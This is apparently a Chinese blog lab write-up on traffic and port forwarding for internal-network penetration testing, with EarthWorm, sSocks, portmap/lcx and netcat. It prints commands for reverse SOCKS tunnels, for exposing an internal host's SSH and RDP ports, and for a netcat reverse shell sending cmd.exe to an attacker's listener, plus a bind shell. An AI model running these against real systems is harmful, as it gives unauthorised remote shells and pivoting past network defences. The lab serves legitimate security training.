端口与流量转发

最新推荐文章于 2024-08-03 22:57:21 发布
最新推荐文章于 2024-08-03 22:57:21 发布
阅读量1.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52263461/article/details/112967633
版权

流量转发

socks代理工具

Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/

主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便

sSocks 工具地址: http://sourceforge.net/projects/ssocks/

sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14

下载解压后,执行命令编译。

nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口

反向代理实验步骤:

将kali 和 win03 都安装EW工具

在这里插入图片描述

在这里插入图片描述

2

在公网服务器(kali 3.106)上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

在这里插入图片描述
kaili配置两块网卡

在这里插入图片描述

在目标机器执行以下命令
.\ew_for_Win.exe -s rssocks -d 192.168.3.106 -e 1024 通过socks隧道连接公网IP的1024端口

在这里插入图片描述

与公网服务器连接成功. 并且在火狐开启代理

在这里插入图片描述
服务器(kali)ip
在这里插入图片描述

在这里插入图片描述

正向代理

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理 (kaili服务器 )

在这里插入图片描述
配置火狐浏览器

在这里插入图片描述

端口转发

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,

在这里插入图片描述

portmap实验步骤:公网主机Centos

先在具有公网ip的主机上执行:

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777 意思是监听来自6666端口的请求,将其转发到7777端口

在这里插入图片描述

再在内网主机上执行:

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

意思就是将内网主机22端口的流量转发到公网主机的6666端口

在这里插入图片描述

然后在Linux系统命令行下执行

ssh 公网主机ip 7777
即可连接内网主机。

在这里插入图片描述

nc 反弹

反向连接实验步骤:kali(外网ip) win03(内网ip)

kali开启监听端口 nc - lvvp 4444

在这里插入图片描述
2.

win03 输入指令 nc -t -e cmd.exe 192.168.3.106(公网ip) 4444

在这里插入图片描述
3.

可以看见反弹成功

在这里插入图片描述

正向连接实验步骤:win03作为远程主机 kali作为本机

控制端主动连接被控制端

远程主机上执行:

nc -l -p 4444 -t -e cmd.exe

在这里插入图片描述
2.

本地主机上执行:

nc -vv 远程主机ip 4444

连接成功

在这里插入图片描述

lcx 内网端口转发

实验步骤:公网主机win03 内网主机 win08r2

08上输入指令
lcx -slave 公网主机ip 4444 127.0.0.1 3389
意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

在这里插入图片描述

公网主机win03执行命令

Lcx –listen 公网主机端口1(内网主机给转发过来的端口) 公网主机端口2

lcx -listen 4444 6666

在这里插入图片描述

打开远程连接验证

公网ip 端口号

在这里插入图片描述

未来叫兽
关注
Termite最新版1.8.4.zip
02-27
Termite 是EW的最新版,具有多平台支持、跳板机互联、正反向级联、小巧无依赖、和内置Shell令主机管理更方便等特性,分为管理端admin和客户端agent。
流量转发端口转发
12-15 6721
概述 在做内网渗透时,并不是说获取了shell就拥有权限了,这个时候我们要进行提权等操作,但实际上实际情况是很复杂的,有时候并不能提权成功,比如无法搞定杀软等情况,这个时候我们想要访问到内网的其他机器(不与外网相通的),这时候我们可以选择上传工具到服务器进行操作或者将我们的攻击流量代理到内网中才能进一步的对内网进行渗透,但是第一种方式是及其麻烦而且会改变服务器的环境的,所以不推荐。那么就将流量代理到内网中。 代理方式 代理可以分为正向代理和反向代理两种,对于正向代理,最容易理解了,就是大家常用的vps、vp
内网穿透--LCX端口转发实验
最新发布
qq_65150735的博客
08-03 380
内网穿透--LCX端口转发实验
[内网渗透]—流量转发
Sentiment的博客
12-08 391
模拟拿到Win2012的webshell,但对方限制了TCP无法使用frp,nps等做隧道转发,但对外开放了HTTP的web服务,通过web服务做代理转发。模拟win2012出网并且拿到了webshell,并且有一张内网网卡,通过Win2012将Win2016中转上线。攻击—>生成后门—>Windows可执行程序(stageless),添加刚刚生成的监听器即可。攻击—>生成后门—>Windows可执行程序,添加一个监听器生成即可。:基于sockets 5。:基于socks 4。添加1080端口代理。
渗透测试之内网渗透(三):流量转发
m0_74131821的博客
04-25 1600
在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透
流量转发映射
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-29 4994
iptable nginx proxy sockts ssh tls 正向代理 内网请求代理服务器访问公网 反向代理 内网把自己的东西放到公网上去,然后别人从公网访问 比如代理服务器的80端口只能从内网访问,8080端口能从公网访问。内网将数据放到代理的80端口,然后代理服务器将80端口的数据转发到8080端口,公网直接访问8080端口。 ssh centos ip :172.16.11.78 kali ip:172.16.11.83 首先,centos开启web服务 这里在网站根目录下新建一个123
tcp端口转发流量转发
04-08
tcp端口转发流量转发
Mac 端口转发Python工具
06-23
在IT行业中,端口转发是一种网络技术,它允许网络流量从一个端口被重定向到另一个不同的端口,这可以是同一台机器的不同端口,也可以是不同机器之间的端口。在Mac上,Python提供了一种灵活的方式实现这一功能,通过...
端口映射端口转发的c#代码
04-27
端口映射与端口转发是网络通信中的关键技术,特别是在处理内网访问与网络安全时。C#作为.NET框架下的主要编程语言,提供了丰富的库和API来实现这些功能。在这个场景下,`Htran`是一个知名的端口映射和端口转发工具,...
windows 端口转发.zip
06-07
- **负载均衡和代理**:端口转发也可以用于分发流量到多个服务器,或者作为代理服务隐藏后端服务器的IP地址。 总的来说,这个“windows 端口转发.zip”压缩包提供了一套可能的端口转发解决方案,结合了OpenSSL库和...
windows下最好用的端口转发软件
01-10
安装使用比较简单,只需要把源ip,端口和目标ip,端口写完整就可以了。
端口查看工具(管理windows各端口运行程序的小工具)
07-30
管理windows下运行在各个端口的程序
流量转发(2)
weixin_52263461的博客
01-22 915
Regeorg+proxychains https://github.com/L-codes/Neo-reGeorg // reGeorg工具下载 reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。 proxychains 工
内网转发工具EW的使用
Bird&Bird
12-22 4010
目录EW(EarthWorm)结合proxychains代理链EW正向代理EW反向代理 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用,跨平台,任何平台都可以轻松使用! EW(
流量转发——rinetd工具
jumprn的博客
06-30 536
rinetd操作
端口转发&&映射详解、代理&&反向代理深入认知
NZXHJ的博客
08-01 9502
端口转发&映射详解、代理&&反向代理深入认知
IPv6通讯原理(1) - 不能忽略的网卡启动过程
weixin_30642305的博客
06-16 203
本文主题:通过抓包分析,深入观察网卡启动过程的每个步骤,从而逐步掌握通讯原理。
亚马逊云服务器流量转发什么意思?
聚搜云_上海聚搜信息技术有限公司
08-10 174
亚马逊云服务器流量转发是一项重要的网络管理功能,用于将来自多个来源的流量引导到相应的目标服务器或网站。这可以提高服务器的性能和可靠性,并避免单点故障。同时,流量转发还可以通过将流量引导到不同地理位置的服务器,实现更快的响应时间和更好的用户体验。该功能能够根据特定的规则和条件,将流量从不同的源位置转发到指定的目标位置,实现灵活的网络流量管理和负载均衡。4. 安全性考虑:在进行流量转发时,亚马逊云提供了一系列安全功能,如SSL/TLS卸载和Web应用程序防火墙(WAF),以保护流量的安全性和可靠性。
iptables端口转发配置实现
热门推荐
C3399的博客
06-11 1万+
一、iptables简介 二、iptables端口转发实现 三、iptables端口转发实现过程的坑
端口转发工具lcx流量特征
05-17
LCX是一种常用的端口转发工具,它可以在本地和远程主机之间建立TCP连接,并将数据在连接之间转发。由于LCX转发的是TCP流量,因此其流量特征如下: 1. TCP协议:LCX是基于TCP协议的端口转发工具,因此其流量中只会有TCP协议的数据包。 2. 源IP地址和端口:LCX会将本地主机的IP地址和端口作为源地址和源端口,发送数据到远程主机。 3. 目标IP地址和端口:LCX会将远程主机的IP地址和端口作为目标地址和目标端口,将数据转发到远程主机。 4. 数据长度:LCX转发的数据长度可以根据实际情况不同而不同。 5. 数据内容:LCX转发的数据内容可以是任意的TCP数据,包括HTTP、FTP、SSH等各种应用层协议的数据。 总的来说,LCX的流量特征较为简单,基本都是TCP协议数据包,包含源IP地址和端口、目标IP地址和端口、数据长度和数据内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值